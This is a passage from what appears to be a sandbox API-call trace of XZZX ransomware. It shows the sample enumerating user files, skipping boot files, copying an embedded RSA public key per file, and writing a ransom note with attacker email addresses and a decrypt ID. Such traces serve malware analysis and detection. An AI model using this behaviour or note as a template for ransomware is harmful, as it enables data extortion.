lpFindFileData=0x17b1e0) returned 1 [0176.753] lstrcmpW (lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX", lpString2="..") returned 1 [0176.753] lstrcmpW (lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX", lpString2=".") returned 1 [0176.753] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0176.753] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="ntldr") returned 0x0 [0176.753] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="NTLDR") returned 0x0 [0176.753] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0176.754] StrStrW (lpFirst="33820CBD02F4B0D349B807FF070C951B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0176.754] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0176.754] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") [0176.754] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0176.754] lstrcpyW (in: lpString1=0x17addc, lpString2="33820CBD02F4B0D349B807FF070C951B.XZZX" | out: lpString1="33820CBD02F4B0D349B807FF070C951B.XZZX") returned="33820CBD02F4B0D349B807FF070C951B.XZZX" [0176.754] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0176.754] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xaac [0176.755] Sleep (dwMilliseconds=0x96) [0176.909] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0176.909] lstrcmpW (lpString1="3D2178A332ED6F4701E92E353705538F.XZZX", lpString2="..") returned 1 [0176.909] lstrcmpW (lpString1="3D2178A332ED6F4701E92E353705538F.XZZX", lpString2=".") returned 1 [0176.909] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0176.909] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="ntldr") returned 0x0 [0176.909] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="NTLDR") returned 0x0 [0176.909] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0176.909] StrStrW (lpFirst="3D2178A332ED6F4701E92E353705538F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0176.909] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0176.909] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") [0176.910] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0176.910] lstrcpyW (in: lpString1=0x17addc, lpString2="3D2178A332ED6F4701E92E353705538F.XZZX" | out: lpString1="3D2178A332ED6F4701E92E353705538F.XZZX") returned="3D2178A332ED6F4701E92E353705538F.XZZX" [0176.910] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0176.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xab0 [0176.910] Sleep (dwMilliseconds=0x96) [0177.068] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.068] lstrcmpW (lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpString2="..") returned 1 [0177.068] lstrcmpW (lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpString2=".") returned 1 [0177.068] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0177.068] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="ntldr") returned 0x0 [0177.068] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="NTLDR") returned 0x0 [0177.068] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0177.068] StrStrW (lpFirst="9345D86A0F87DA84ADA8003E13B4BECC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0177.068] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0177.068] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") [0177.068] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0177.069] lstrcpyW (in: lpString1=0x17addc, lpString2="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" | out: lpString1="9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned="9345D86A0F87DA84ADA8003E13B4BECC.XZZX" [0177.069] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0177.069] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xab4 [0177.069] Sleep (dwMilliseconds=0x96) [0177.221] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.221] lstrcmpW (lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpString2="..") returned 1 [0177.221] lstrcmpW (lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpString2=".") returned 1 [0177.221] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0177.221] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="ntldr") returned 0x0 [0177.221] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="NTLDR") returned 0x0 [0177.221] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0177.221] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0177.221] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0177.222] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") [0177.222] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0177.222] lstrcpyW (in: lpString1=0x17addc, lpString2="A216BEA01542C25C94FD01F0195AA6A4.XZZX" | out: lpString1="A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned="A216BEA01542C25C94FD01F0195AA6A4.XZZX" [0177.222] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0177.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xab8 [0177.222] Sleep (dwMilliseconds=0x96) [0177.377] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.377] lstrcmpW (lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpString2="..") returned 1 [0177.377] lstrcmpW (lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpString2=".") returned 1 [0177.377] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0177.377] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="ntldr") returned 0x0 [0177.377] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="NTLDR") returned 0x0 [0177.377] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0177.377] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="ntdetect.com") returned 0x0 [0177.377] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0177.378] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") [0177.378] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0177.378] lstrcpyW (in: lpString1=0x17addc, lpString2="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" | out: lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" [0177.378] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0177.378] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xabc [0177.378] Sleep (dwMilliseconds=0x96) [0177.533] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.533] lstrcmpW (lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpString2="..") returned 1 [0177.533] lstrcmpW (lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpString2=".") returned 1 [0177.533] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0177.533] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="ntldr") returned 0x0 [0177.533] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="NTLDR") returned 0x0 [0177.533] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0177.533] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="ntdetect.com") returned 0x0 [0177.533] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0177.533] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") [0177.534] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0177.534] lstrcpyW (in: lpString1=0x17addc, lpString2="E85C7261086E23DEDFC379D70C9B0826.XZZX" | out: lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX") returned="E85C7261086E23DEDFC379D70C9B0826.XZZX" [0177.534] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0177.534] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xac0 [0177.534] Sleep (dwMilliseconds=0x96) [0177.689] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0177.689] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0177.689] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0177.689] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0177.689] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0177.689] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0177.690] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0177.690] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" [0177.690] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*" [0177.690] SetErrorMode (uMode=0x1) returned 0x1 [0177.690] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\_HELP_INSTRUCTION.TXT") returned 98 [0177.690] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0177.691] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0177.691] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0xac4) returned 0x0 [0177.691] RegQueryValueExW (in: hKey=0xac4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437bf78, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x437bf78*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0177.691] RegCloseKey (hKey=0xac4) returned 0x0 [0177.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0177.691] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0177.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac4 [0177.692] CloseHandle (hObject=0xac4) returned 1 [0177.692] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0177.692] PathFindFileNameW 